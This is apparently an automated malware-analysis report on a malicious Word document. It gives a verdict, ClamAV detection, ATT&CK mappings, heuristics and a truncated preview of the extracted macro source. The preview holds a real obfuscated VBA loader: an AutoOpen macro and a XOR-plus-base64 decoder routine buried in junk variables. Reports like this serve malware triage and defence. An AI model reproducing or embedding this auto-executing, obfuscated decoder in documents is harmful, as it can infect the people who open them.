Verdict: MALICIOUS
Risk Score: 228
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV with the signature 'Doc.Malware.Chronos-6897935-0'. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that uses GetObject for execution. The VBA script itself appears heavily obfuscated, but its structure suggests it is designed to execute further code, likely a second-stage payload. This points to a macro-based malware delivery mechanism.
Heuristics (7)
- ClamAV: Doc.Malware.Chronos-6897935-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11287 bytes | 9d1767de9ec8409cba0113ab8104fb22cb63d6392401ac29ca40d7729840fd96 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ResetStartNo()
Dim SettingsFile As String
Dim Order As String
Dim sQuery As String
SettingsFile = Options.DefaultFilePath(wdStartupPath) & "\Settings.ini"
Order = System.PrivateProfileString(SettingsFile, "DocNumber", "Order")
sQuery = InputBox("Reset start number?", "Reset", Order)
If sQuery = "" Then Exit Sub
Order = sQuery
System.PrivateProfileString(SettingsFile, "DocNumber", "Order") = Order
lbl_Exit:
Exit Sub
End Sub
Function highboy(abigail) As String
involvement = StrReverse("pa") + Left("ogeedichondra", 4)
Dim couth(63) As Long
scleroparei = "cautiously"
Dim buxaceae() As Byte
Dim blowy As Integer
Dim officiousness(255) As Byte
Dim analyze(63) As Long
Dim amarelle(63) As Long
Dim nagari() As Byte
Dim antigone As Long
Dim intercourse As String
Dim atelier As Long
Dim city As Long
Dim defiant As Long
santolina = 258048
cataplasm = 262144
pneumatograph = 4 - 17 + 4109
sauromalus = 65536
cerebrovascular = 4032
exhausted = 6 + 249
delusion = 91 - 86 + 117 + 65158
antisocial = 64
biotic = 16711680
malm = 256
nitrate = 63
needlebush = 16515072
Dim aviatrix As Variant
Dim humanities() As Byte
humanities = StrConv(abigail, vbFromUnicode)
Dim stenographic As Byte
For harmonically = 0 To UBound(humanities)
humanities(harmonically) = humanities(harmonically) + 2 Xor 20
Next harmonically
For beware = 42 To 60
cetorhinidae = 60
suppressive = suppressive - 279
catostomid = Mid("nyctaginiamancrystallography", 11, 3) + "ganit" + "e"
catostomid = Lcase("aL") + Ucase("buQUe") + Right("indrirque", 4)
Next beware
bosh = StrConv(humanities, vbUnicode)
blowy = 2
cups = 122
For atelier = 0 To 255
Select Case atelier
Case 65 To 90
officiousness(atelier) = atelier - 65
Case 97 To cups
officiousness(atelier) = atelier - 71
Case 48 To 57
officiousness(atelier) = atelier + 51 + 57 + 88 - 192
Case 43
officiousness(atelier) = 62
Case 47
officiousness(atelier) = 63
End Select
Next atelier
For atelier = 0 To 63
couth(atelier) = atelier * antisocial
analyze(atelier) = atelier * pneumatograph
amarelle(atelier) = atelier * cataplasm
Next atelier
buxaceae = StrConv(bosh, vbFromUnicode)
preachment = 4
ReDim nagari((((UBound(buxaceae) + 1) \ preachment) * 3) - 1)
For antigone = 0 To UBound(buxaceae) Step 4
chemotherapeutic = buxaceae(antigone)
petrel = 3
city = amarelle(officiousness(chemotherapeutic)) + analyze(officiousness(buxaceae(antigone + 1))) + _
couth(officiousness(buxaceae(antigone + 2))) + officiousness(buxaceae(antigone + petrel))
atelier = city And biotic
nagari(defiant) = atelier \ sauromalus
atelier = city And delusion
nagari(defiant + 1) = atelier \ malm
nagari(defiant + 2) = city And exhausted
defiant = defiant + 3
Next antigone
intercourse = StrConv(nagari, vbUnicode)
If blowy Then intercourse = Left$(intercourse, Len(intercourse) - blowy)
highboy = intercourse
End Function
Public Sub AutoOpen()
Dim carpellary As Integer
Dim fortemente As Integer
involvement = "nephritis"
Dim bihari As Integer
Dim ascospore As Byte
bihari = 8 Mod (20)
duodenal = Right("anachronicac", 2) + Ucase("CidE") + Mid("edulcoratentinterruption", 11, 2)
If bihari < 111 - 242 Then
suppressive = suppressive - 437
TestPassing1
Else
Dim movableness As Integer
dichloride.Scroll fmScrollActionNoChange, fmScrollActionEnd
psychogenic = 82
chlorination = 63
If psychogenic + chlorination < 9 Then
psychogenic = "bab" & StrReverse("diise") & Lcase("aE")
animam = StrReverse("or") + "otle" + Mid("antiquariantdemonstrate", 12, 1)
Else
chlorination = 30
End If
End If
End Sub
Sub mastoiditis(peninsula)
Dim alouatta As String
Dim teachable As Integer
Dim paths As Long
shirker = shirker \ 254
beseem = Left("tacatspaw", 2) + Right("benchngie", 4) + Right("fitted
```

... (truncated)